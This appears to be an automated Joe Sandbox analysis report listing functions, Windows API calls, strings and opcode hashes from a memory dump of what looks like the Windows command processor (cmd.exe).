                              • Opcode ID: 9ddfc09aa9d90f0088fd16abda3ebe38fb5bbbe8bdae055d7e84e31eac367ca0
                              • Instruction ID: 7710e6d0b294a27612e4b708d2cecc0d89f52baa82a7abeca6efe723b315ab64
                              • Opcode Fuzzy Hash: 9ddfc09aa9d90f0088fd16abda3ebe38fb5bbbe8bdae055d7e84e31eac367ca0
                              • Instruction Fuzzy Hash: 8DC0123070C686C7EB1C7F3224D203995745B48201F48553CCD16852C5DE2CD8049610
                              Function 00007FF744F15508 Relevance: 1.5, APIs: 1, Instructions: 17COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000005.00000002.1447290933.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000005.00000002.1447257773.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447369137.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F41000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447500083.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: DefaultUser
                              • String ID:
                              • API String ID: 3358694519-0
                              • Opcode ID: 5d8fc4fa8e665926eb49570ec356dc21582dec5ebc006b351cd7b5a4e2c943bd
                              • Instruction ID: c96279c03d28a59c3891dd195563f59f44b9e76fd5f8c5117aa551d2f084abb9
                              • Opcode Fuzzy Hash: 5d8fc4fa8e665926eb49570ec356dc21582dec5ebc006b351cd7b5a4e2c943bd
                              • Instruction Fuzzy Hash: DCE08CA2D1C252CAF7943E4360C12B49963CB78786FC85031CE0E016C8592D3C416228
                              Function 00007FF744F12E44 Relevance: 1.3, APIs: 1, Instructions: 29COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000005.00000002.1447290933.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000005.00000002.1447257773.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447369137.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F41000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447500083.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: memset
                              • String ID:
                              • API String ID: 2221118986-0
                              • Opcode ID: f77ccc38f2f42b08cf4ed255524ec50c837bf5ddba9254f495b6a2bfe7d154bb
                              • Instruction ID: 0e72c33b1ffc881289be9352e4b2ab3f500441efd4ef5ea920e8a5d69058bdd6
                              • Opcode Fuzzy Hash: f77ccc38f2f42b08cf4ed255524ec50c837bf5ddba9254f495b6a2bfe7d154bb
                              • Instruction Fuzzy Hash: 56F0B421B0D78180EF44AF97B58012992A09B48BE0F8C8334EE7D47BDDDE3CD8518300

                              Non-executed Functions

                              Function 00007FF744F27F00 Relevance: 61.6, APIs: 28, Strings: 7, Instructions: 341memoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF744F27F44
                              • _get_osfhandle.MSVCRT ref: 00007FF744F27F5C
                              • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF744F27F9E
                              • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF744F27FFF
                              • ReadConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF744F28020
                              • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF744F28036
                              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF744F28061
                              • RtlFreeHeap.NTDLL ref: 00007FF744F28075
                              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF744F280D6
                              • RtlFreeHeap.NTDLL ref: 00007FF744F280EA
                              • _wcsnicmp.MSVCRT ref: 00007FF744F28177
                              • _wcsnicmp.MSVCRT ref: 00007FF744F2819A
                              • _wcsnicmp.MSVCRT ref: 00007FF744F281BD
                              • _wcsnicmp.MSVCRT ref: 00007FF744F281DC
                              • _wcsnicmp.MSVCRT ref: 00007FF744F281FB
                              • _wcsnicmp.MSVCRT ref: 00007FF744F2821A
                              • _wcsnicmp.MSVCRT ref: 00007FF744F28239
                              • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF744F28291
                              • SetConsoleCursorPosition.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF744F282D7
                              • FillConsoleOutputCharacterW.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF744F282FB
                              • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF744F2831A
                              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF744F28364
                              • RtlFreeHeap.NTDLL ref: 00007FF744F28378
                              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF744F2839A
                              • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF744F283AE
                              • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF744F283E6
                              • ReadConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF744F28403
                              • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF744F28418
                              Strings
                              Memory Dump Source
                              • Source File: 00000005.00000002.1447290933.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000005.00000002.1447257773.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447369137.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F41000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447500083.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: Heap$Console_wcsnicmp$LockProcessShared$Free$AcquireBufferInfoReadReleaseScreen$AllocCharacterCursorFillHandleOutputPositionWrite_get_osfhandle
                              • String ID: cd $chdir $md $mkdir $pushd $rd $rmdir
                              • API String ID: 3637805771-3100821235
                              • Opcode ID: 850dcbeef8071bc1ba491ee474855cf363d50a31b10de6fe1cf39c68a2eba243
                              • Instruction ID: bdbd9e565c051ae0c14a6602d3bc232970382b21f3ade09fb21be2aee44fa69e
                              • Opcode Fuzzy Hash: 850dcbeef8071bc1ba491ee474855cf363d50a31b10de6fe1cf39c68a2eba243
                              • Instruction Fuzzy Hash: 50E15D31A0CA52CBE710BF66A484179FAA1FB49B95BC89234CD1E537D8DF3DA405E720
                              Function 00007FF744F14224 Relevance: 45.8, APIs: 19, Strings: 7, Instructions: 328threadprocessstringCOMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000005.00000002.1447290933.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000005.00000002.1447257773.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447369137.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F41000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447500083.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: AttributeProcThread$List$CloseCreateDeleteErrorHandleLastProcessmemsetwcsrchr$InfoInitializeStartupUpdateUser_local_unwind_wcsnicmplstrcmp
                              • String ID: %01C$%08X$=ExitCode$=ExitCodeAscii$COPYCMD$\XCOPY.EXE$h
                              • API String ID: 388421343-2905461000
                              • Opcode ID: 91aa278bae488f07ca69690407c5ac2f944185e63ade342298008147df7553ae
                              • Instruction ID: 5f55e176528d11ecf72b878e2fb3b1a585c613e1708ae77f08e6ae228aaec5b3
                              • Opcode Fuzzy Hash: 91aa278bae488f07ca69690407c5ac2f944185e63ade342298008147df7553ae
                              • Instruction Fuzzy Hash: E5F1FD32A0DA82C6E760BF12A4857BAF7A4FB85744F885135DE4D426D9DF3CE844DB20
                              Function 00007FF744F07650 Relevance: 42.5, APIs: 23, Strings: 1, Instructions: 461fileCOMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000005.00000002.1447290933.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000005.00000002.1447257773.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447369137.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F41000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447500083.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: File_get_osfhandle$memset$PathPointerReadSearchSizeType_wcsnicmpwcsrchr
                              • String ID: DPATH
                              • API String ID: 95024817-2010427443
                              • Opcode ID: 2dd73e123b097a23a112381bfb0238d2ff060e9a1d02d3e8a60a86283e7ef037
                              • Instruction ID: fdf1c9d199881771c3676fd1c97f271bcde98bc2271fcff13a2e8f64a7f1daab
                              • Opcode Fuzzy Hash: 2dd73e123b097a23a112381bfb0238d2ff060e9a1d02d3e8a60a86283e7ef037
                              • Instruction Fuzzy Hash: BD129232A0C682C6E764BF169480179F6A1FB89B54F885235EE4E577DCDF7DE8009B10
                              Function 00007FF744F2EE88 Relevance: 30.0, APIs: 15, Strings: 2, Instructions: 225COMMON
                              Download Yara Rule
                              APIs
                              • _wcsupr.MSVCRT ref: 00007FF744F2EF33
                              • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF744F2E964), ref: 00007FF744F2EF98
                              • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF744F2E964), ref: 00007FF744F2EFA9
                              • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF744F2E964), ref: 00007FF744F2EFBF
                              • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0 ref: 00007FF744F2EFDC
                              • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF744F2E964), ref: 00007FF744F2EFED
                              • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF744F2E964), ref: 00007FF744F2F003
                              • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF744F2E964), ref: 00007FF744F2F022
                              • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF744F2E964), ref: 00007FF744F2F083
                              • FlushConsoleInputBuffer.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF744F2E964), ref: 00007FF744F2F092
                              • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF744F2E964), ref: 00007FF744F2F0A5
                              • towupper.MSVCRT(?,?,?,?,?,?), ref: 00007FF744F2F0DB
                              • wcschr.MSVCRT(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF744F2E964), ref: 00007FF744F2F135
                              • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF744F2E964), ref: 00007FF744F2F16C
                              • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF744F2E964), ref: 00007FF744F2F185
                                • Part of subcall function 00007FF744F101B8: _get_osfhandle.MSVCRT ref: 00007FF744F101C4
                                • Part of subcall function 00007FF744F101B8: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FF744F1E904,?,?,?,?,00000000,00007FF744F13491,?,?,?,00007FF744F24420), ref: 00007FF744F101D6
                              Strings
                              Memory Dump Source
                              • Source File: 00000005.00000002.1447290933.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000005.00000002.1447257773.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447369137.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F41000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447500083.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: Console$Mode$Handle$BufferFileFlushFreeInputLocalType_get_osfhandle_wcsuprtowupperwcschr
                              • String ID: <noalias>$CMD.EXE
                              • API String ID: 1161012917-1690691951
                              • Opcode ID: f8298d22c9df71f240bd9e1abb4a97c4f8b0018ea53697e3e253b80e8643b65e
                              • Instruction ID: 8e4a8cec4821cebf0119f23b162a3bddd5efd156707fcef8d8f470724f2b7f88
                              • Opcode Fuzzy Hash: f8298d22c9df71f240bd9e1abb4a97c4f8b0018ea53697e3e253b80e8643b65e
                              • Instruction Fuzzy Hash: 20918122B0C652CAFB14BF62E4801BDAAA0BF49B55FDC4135DE0E526DDDF3DA445A230
                              Function 00007FF744F06EE4 Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 342timeCOMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000005.00000002.1447290933.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000005.00000002.1447257773.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447369137.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F41000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447500083.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: Time$File$System$DateDefaultFormatInfoLocalLocaleUsermemmoverealloc
                              • String ID: %02d%s%02d%s%02d$%s $%s %s
                              • API String ID: 1795611712-4023967598
                              • Opcode ID: 74249970fbf2e4b7620cc53d3e0e908d97b29c4ace187a61a8b0bb0729ed9366
                              • Instruction ID: 00a7122d976a6dfdab02d3af5810ad778b63ba1105f0c3b544aed07b623874f4
                              • Opcode Fuzzy Hash: 74249970fbf2e4b7620cc53d3e0e908d97b29c4ace187a61a8b0bb0729ed9366
                              • Instruction Fuzzy Hash: F0E18E21A0CA42C6EB10BF67A8855B9E6A1FB88784FD84131DE4E576DDDE3CE504A360
                              Function 00007FF744F01560 Relevance: 26.6, APIs: 14, Strings: 1, Instructions: 338fileCOMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000005.00000002.1447290933.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000005.00000002.1447257773.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447369137.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F41000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447500083.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: Find$File$CloseFirstmemset$AttributesErrorLastNext
                              • String ID: \\?\
                              • API String ID: 628682198-4282027825
                              • Opcode ID: bfecd11a4866ca550013cb8df7d01d0eb9b862476b4829b349704babc3ba77e1
                              • Instruction ID: 7d174f70306791720fd56abefa33272099d4dcb233ab988f4dc7361472fbd2b7
                              • Opcode Fuzzy Hash: bfecd11a4866ca550013cb8df7d01d0eb9b862476b4829b349704babc3ba77e1
                              • Instruction Fuzzy Hash: B0E1A122A0CA82C6EB64BF22D9942F9A3A0FB85749F885135DE0E477D8DF3CE545D310
                              Function 00007FF744F31538 Relevance: 19.7, APIs: 13, Instructions: 169filememorynativeCOMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000005.00000002.1447290933.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000005.00000002.1447257773.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447369137.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F41000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447500083.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: Path$ErrorName$Lastmemset$CreateDirectoryFileFullVolumememmove$CloseControlDriveFreeHandleHeapInformationName_RemoveStatusType_wcsicmp
                              • String ID:
                              • API String ID: 3935429995-0
                              • Opcode ID: 2ee110a42e0ffdb27aede9fb5eb1a80379d063d7b2cbba6d0c9e22b52d84b57f
                              • Instruction ID: cb51bb44a9ca32ddad11f678f595a0e95cf7b92bd1ee9cd79aad57f1cc0df176
                              • Opcode Fuzzy Hash: 2ee110a42e0ffdb27aede9fb5eb1a80379d063d7b2cbba6d0c9e22b52d84b57f
                              • Instruction Fuzzy Hash: C461AD26A0C652C7E750FF22A58457AFBA4FB89F55F898134DE4A43798DF3CD401A710
                              Function 00007FF744F13140 Relevance: 19.5, APIs: 7, Strings: 4, Instructions: 229timeCOMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000005.00000002.1447290933.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000005.00000002.1447257773.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447369137.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F41000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447500083.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: Time$File$System$FormatInfoLocalLocale
                              • String ID: $%02d%s%02d%s$%2d%s%02d%s%02d%s%02d$HH:mm:ss t
                              • API String ID: 55602301-695310191
                              • Opcode ID: d793cf68f885368b4ca952d7378f9a0084057b150934299f8dfb9ae4312d122b
                              • Instruction ID: 7dde6f2d5a9dd0fd39fb38a2ea79c0409b202d777f4e787c1d088ec93709e775
                              • Opcode Fuzzy Hash: d793cf68f885368b4ca952d7378f9a0084057b150934299f8dfb9ae4312d122b
                              • Instruction Fuzzy Hash: 5CA16D22A1C642D6FB10BF12E4802BAA7B5FB94754F980135EE5E436D8EF3CE944E710
                              Function 00007FF744F035B8 Relevance: 18.2, APIs: 12, Instructions: 214COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000005.00000002.1447290933.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000005.00000002.1447257773.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447369137.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F41000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447500083.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: AttributesFile
                              • String ID:
                              • API String ID: 3188754299-0
                              • Opcode ID: 7911f8452db39d7657d313559ed3967f3c9c4d9a39ee1e7965673abb96ed0397
                              • Instruction ID: a94f878ba3252cfc79afc96fd8d4d9737a5a035d82f4768fec7cb432b4138c53
                              • Opcode Fuzzy Hash: 7911f8452db39d7657d313559ed3967f3c9c4d9a39ee1e7965673abb96ed0397
                              • Instruction Fuzzy Hash: F891F23260CA82C6EB24BF66D5902FDB6A0FB85746F884131DE4E467D8DF3DD544E220
                              Function 00007FF744F1823C Relevance: 15.1, APIs: 10, Instructions: 116COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000005.00000002.1447290933.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000005.00000002.1447257773.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447369137.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F41000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447500083.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: ErrorFileFindFirstLast
                              • String ID:
                              • API String ID: 873889042-0
                              • Opcode ID: 11074d3c224ce67514852d4966aba4998422fc44b58f31243b65843f6fe49b86
                              • Instruction ID: 4d970e029669f59d066a17517b83e3c43bfb6b9470c017bb9cec167c1c2c28f4
                              • Opcode Fuzzy Hash: 11074d3c224ce67514852d4966aba4998422fc44b58f31243b65843f6fe49b86
                              • Instruction Fuzzy Hash: B4510675A0DB82C6E700BF12A584579BBA0FB59B91FDCA135CE5D43398CF3CE854A620
                              Function 00007FF744F2AA30 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 123registryCOMMON
                              Download Yara Rule
                              APIs
                              • RegCreateKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF744F2AA85
                              • RegSetValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF744F2AACF
                              • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF744F2AAEC
                              • RegDeleteKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF744F298C0), ref: 00007FF744F2AB39
                              • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF744F298C0), ref: 00007FF744F2AB6F
                              • RegDeleteValueW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF744F298C0), ref: 00007FF744F2ABA4
                              • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF744F298C0), ref: 00007FF744F2ABCB
                              Strings
                              Memory Dump Source
                              • Source File: 00000005.00000002.1447290933.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000005.00000002.1447257773.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447369137.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
